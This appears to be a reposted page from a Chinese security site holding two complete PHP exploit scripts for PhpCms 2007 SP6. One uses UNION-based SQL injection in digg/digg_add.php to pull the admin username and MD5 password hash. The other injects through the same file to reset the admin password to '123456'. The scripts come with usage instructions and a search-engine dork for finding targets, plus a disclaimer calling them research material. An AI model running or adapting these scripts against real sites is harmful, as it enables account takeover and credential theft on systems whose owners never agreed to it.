<? print_r(' -------------------------------------------------------------------------------- PhpCms2007 sp6 "digg" SQL injection/admin credentials disclosure exploit BY T00ls(www.T00ls.net) -------------------------------------------------------------------------------- '); if ($argc<3) { print_r(' -------------------------------------------------------------------------------- Usage: php '.$argv[0].' host path host: target server (ip/hostname),without"http://" path: path to phpcms Example: php '.$argv[0].' localhost / -------------------------------------------------------------------------------- '); die; } function getrand($i) { for($j=0;$j<=$i-1;$j++) { srand((double)microtime()*1000000); $randname=rand(!$j ? 1: 0,9); $randnum.=$randname; } return $randnum; } function sendpacketii($packet) { global $host, $html; $ock=fsockopen(gethostbyname($host),'80'); if (!$ock) { echo 'No response from '.$host; die; } fputs($ock,$packet); $html=''; while (!feof($ock)) { $html.=fgets($ock); } fclose($ock); } $host=$argv[1]; $path=$argv[2]; $prefix="phpcms_"; $cookie="PHPSESSID=2456c055c52722efa1268504d07945f2"; if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;} /*get $prefix*/ $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=1/**/union/**/select HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Cookie: ".$cookie."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); if (eregi("in your SQL syntax",$html)) { $temp=explode("From ",$html); if(isset($temp[1])){$temp2=explode("product",$temp[1]);} if($temp2[0]) $prefix=$temp2[0]; echo "[+]prefix -> ".$prefix."/n"; } echo "[~]exploting now,plz waiting/r/n"; $packet ="GET ".$path."digg/digg_add.php?con=2&digg_mod=product&id=".getrand(6)."/**/union/**/all/**/select%201,2,3,concat(username,0x7C0D0A,password)%20from%20".$prefix."member%20where%20userid=1# HTTP/1.0/r/n"; $packet.="Host: ".$host."/r/n"; $packet.="Cookie: ".$cookie."/r/n"; $packet.="Connection: Close/r/n/r/n"; sendpacketii($packet); if (!eregi(chr(181).chr(227).chr(187).chr(247),$html)) { echo $packet; echo $html; die("Exploit failed..."); } else { $pattern="/<a href=/"//(.*?)/">/si"; preg_match($pattern,$html,$pg); $result=explode("|",$pg[1]); print_r(' -------------------------------------------------------------------------------- [+]username -> '.$result[0].' [+]password(md5 32λ) -> '.$result[1].' -------------------------------------------------------------------------------- '); } function is_hash($hash) { if (ereg("^[a-f0-9]{32}",trim($hash))) {return true;} else {return false;} } if (is_hash($result[1])) {echo "Exploit succeeded...";} else {echo "Exploit failed...";} ?>我在补上Ryat 贴出来可以update管理员密码的EXP
#!/usr/bin/php <?php print_r(' +---------------------------------------------------------------------------+ Phpcms 2007 SP6 reset admin password exploit by puret_t mail: puretot at gmail dot com team: http://www.wolvez.org dork: "Powered by Phpcms 2007" +---------------------------------------------------------------------------+ '); /** * works regardless of php.ini settings */ if ($argc < 4) { print_r(' +---------------------------------------------------------------------------+ Usage: php '.$argv[0].' host path user host: target server (ip/hostname) path: path to phpcms user: admin login name Example: php '.$argv[0].' localhost /phpcms/ admin +---------------------------------------------------------------------------+ '); exit; } error_reporting(7); ini_set('max_execution_time', 0); $host = $argv[1]; $path = $argv[2]; $user = $argv[3]; $url = 'http://'.$host.$path.'member/member.php?username='.$user; send(); if (strpos(file_get_contents($url), 'puret_t') !== false) exit("Expoilt Success!/nAdmin New Password:/t123456/n"); else exit("Exploit Failed!/n"); function send() { global $host, $path, $user; $cmd = 'digg_mod=admin,(SELECT/**/1/**/AS/**/credit_on,0x'.bin2hex('1/',password=/'e10adc3949ba59abbe56e057f20f883e/',email=/'puret_t/',showemail=1 WHERE username=/''.$user.'/'#').'/**/AS/**/credit,0x'.bin2hex('/' UNION SELECT 1#').'/**/AS/**/editor)/**/AS/**/ryat/**/LIMIT/**/1%23&id=1&con=6'; $message = "POST ".$path."digg/digg_add.php HTTP/1.1/r/n"; $message .= "Accept: */*/r/n"; $message .= "Accept-Language: zh-cn/r/n"; $message .= "Content-Type: application/x-www-form-urlencoded/r/n"; $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)/r/n"; $message .= "CLIENT-IP: ".time()."/r/n"; $message .= "Host: $host/r/n"; $message .= "Content-Length: ".strlen($cmd)."/r/n"; $message .= "Connection: Close/r/n/r/n"; $message .= $cmd; $fp = fsockopen($host, 80); fputs($fp, $message); $resp = ''; while ($fp && !feof($fp)) $resp .= fread($fp, 1024); return $resp; } ?>免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论